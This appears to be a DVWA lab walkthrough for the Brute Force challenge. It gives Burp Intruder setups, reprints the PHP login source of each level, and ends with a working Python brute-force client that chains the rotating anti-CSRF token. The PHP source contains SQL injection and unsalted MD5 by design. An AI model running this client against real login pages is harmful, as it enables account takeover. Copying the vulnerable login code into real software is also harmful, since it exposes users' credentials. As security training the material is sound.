Difficulty level: LOW
Challenge: weak-password brute force. This is a very easy level: use Burp Suite (BP) or another weak-password scanner to brute-force the login.
Technique 1: open Burp, point the browser at its proxy, enter any username and password and click Login; Burp then captures the request the browser sends.
Technique 2: send the captured request to Intruder, clear the automatic markers and mark only the values of the username and password fields, then load a password dictionary as the payload. With two marked positions, Cluster bomb tries every username against every password; Sniper cycles a single list through one position at a time.
Technique 3: add your own cracking dictionary as an additional payload list.
Result: two accounts were successfully brute-forced; go and try them. A hit is easy to spot in the Intruder results: sort by response Length, because the success page contains "Welcome to the password protected area" and the avatar image instead of the "Username and/or password incorrect." message, and the Low level has no delay or lockout at all.
# Brute Force --- Low source code
<?php
// Only run the check when the Login parameter was submitted
if( isset( $_GET[ 'Login' ] ) ) {
// Get username
$user = $_GET[ 'username' ];
// Get password
$pass = $_GET[ 'password' ];
$pass = md5( $pass ); // hash the password with unsalted MD5 (a fast hash, not encryption)
// Check the database: both values are concatenated into the query unescaped
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful: the response contains the welcome text and the avatar
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
Medium level
Reminder: the same capture-and-Intruder method as above still recovers the password in the end.
Reminder 2: the restriction this level adds is not a separate lookup of username and password (it is still the one query); it escapes both inputs with mysqli_real_escape_string(), which closes the SQL injection the Low query allows, and calls sleep( 2 ) on every failed login. The delay makes each wrong guess cost at least two seconds, which slows Intruder down but does not block it.
# Brute Force --- Medium source code
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Sanitise username input
$user = $_GET[ 'username' ];
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( 2 );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
Difficulty level: HIGH
Reminder 3: look at the High-level code first
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // compare the user_token in the request with the session token; on mismatch redirect to index.php
// Sanitise username input
$user = $_GET[ 'username' ];
$user = stripslashes( $user ); // stripslashes() returns the string with backslashes removed
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // escape characters that are special to MySQL; this is not a check that the username is correct
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = stripslashes( $pass );
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // escape the password the same way
$pass = md5( $pass ); // hash the password with unsalted MD5
// Check database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; // query the database; only a correct username/password pair returns a row. The inputs were escaped above before being inserted into the query, which prevents SQL injection but does nothing against guessing.
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( rand( 0, 3 ) );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken(); // generate a fresh Anti-CSRF token on every page load; the next login attempt must carry this one
?>
Technique 4: send the captured request to Intruder and mark both the password field and the user_token field. Set the attack type to Pitchfork: it takes one payload set per position (one for password, one for user_token) and advances them in step, so the two positions do not conflict.
Reminder 4: in the Intruder options add a Grep-Extract rule that matches the new token from the hidden field `<input type='hidden' name='user_token' value='...' />` in each response, then set the user_token payload type to Recursive grep with the token from the current page as its initial value, so every request carries the value extracted from the previous response. generateSessionToken() rotates the token on each page load and checkToken() rejects anything older, so run the attack with a single thread; concurrent requests would invalidate each other's tokens. With that set up, start the attack; the sleep( rand( 0, 3 ) ) on failures only makes it slower.
This is the brute-force method for the High level.
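The Intruder workflow described for the Low level and the token-chaining needed for the High level, written as a script. This is an added example, not DVWA's code or the author's. The target is a constructed in-process mock of the PHP shown on this page so it runs offline: it keeps one session token, rotates it on every response like generateSessionToken(), and rejects a stale token like checkToken(). A real DVWA instance additionally needs a logged-in PHPSESSID and a `security` cookie, sleeps on failed attempts, and redirects to index.php on a bad token; the mock returns an error message instead and the `/vulnerabilities/brute/` path is only assumed.

```python
"""Brute-force client for DVWA's Brute Force page that handles the per-request
anti-CSRF token of the High level.  Added example, not DVWA's code.  The
target is a constructed mock of the PHP logic on this page (no sleep, no
login session) so the script runs offline."""
import hashlib
import re
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode, urlparse
from urllib.request import HTTPCookieProcessor, build_opener

# Constructed users table in the shape of DVWA's: user -> md5(password).
USERS = {
    "admin": hashlib.md5(b"password").hexdigest(),
    "pablo": hashlib.md5(b"letmein").hexdigest(),
}
# DVWA's tokenField() emits exactly this hidden input; the same regex serves
# as the Grep-Extract rule in Intruder.
TOKEN_RE = re.compile(r"name='user_token' value='([0-9a-f]+)'")
SUCCESS_MARKER = "Welcome to the password protected area"


class MockBruteHigh(BaseHTTPRequestHandler):
    """Mimics the High-level PHP: checkToken() against the session token, the
    md5 lookup, then generateSessionToken() rotating the token on every
    response.  One global session is enough for a single-client demo."""
    session_token = None

    def do_GET(self):
        q = {k: v[0] for k, v in parse_qs(urlparse(self.path).query).items()}
        body = ""
        if "Login" in q:
            if q.get("user_token") != MockBruteHigh.session_token:
                body = "<pre>CSRF token is incorrect</pre>"      # stale or missing token
            elif USERS.get(q.get("username")) == hashlib.md5(
                    q.get("password", "").encode()).hexdigest():
                body = f"<p>{SUCCESS_MARKER} {q['username']}</p>"
            else:
                body = "<pre><br />Username and/or password incorrect.</pre>"
        MockBruteHigh.session_token = secrets.token_hex(16)        # generateSessionToken()
        body += (f"<form><input type='hidden' name='user_token' "
                 f"value='{MockBruteHigh.session_token}' /></form>")
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):      # keep the demo output quiet
        pass


def start_mock():
    """Start the mock on a free localhost port; returns the brute-force page URL."""
    server = HTTPServer(("127.0.0.1", 0), MockBruteHigh)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}/vulnerabilities/brute/"


def brute_force(url, username, wordlist, cookie=None):
    """Try each candidate password for `username`; returns the hit or None.
    Every request carries the token extracted from the previous response,
    which is why this loop (like Intruder on High) must stay sequential."""
    opener = build_opener(HTTPCookieProcessor())
    if cookie:                         # e.g. "PHPSESSID=...; security=high" on real DVWA
        opener.addheaders = [("Cookie", cookie)]
    token = TOKEN_RE.search(opener.open(url).read().decode()).group(1)
    for candidate in wordlist:
        query = urlencode({"username": username, "password": candidate,
                           "Login": "Login", "user_token": token})
        page = opener.open(f"{url}?{query}").read().decode()
        match = TOKEN_RE.search(page)
        if match:
            token = match.group(1)     # fresh token for the next attempt
        if SUCCESS_MARKER in page:
            return candidate
    return None


def stale_token_rejected(url):
    """Why the attack cannot be parallelised: a token from one response ago
    is refused even when the credentials are correct."""
    opener = build_opener(HTTPCookieProcessor())
    old = TOKEN_RE.search(opener.open(url).read().decode()).group(1)
    opener.open(url).read()            # another page load rotates the token
    query = urlencode({"username": "admin", "password": "password",
                       "Login": "Login", "user_token": old})
    return SUCCESS_MARKER not in opener.open(f"{url}?{query}").read().decode()


if __name__ == "__main__":
    target = start_mock()
    print("admin ->", brute_force(target, "admin", ["123456", "qwerty", "password"]))
    print("stale token rejected:", stale_token_rejected(target))
```

Against the Low and Medium levels the same loop works unchanged (the token is simply absent, so the regex never matches and the parameter is ignored); on Medium each failed attempt just costs the extra two seconds, and on High a random zero to three.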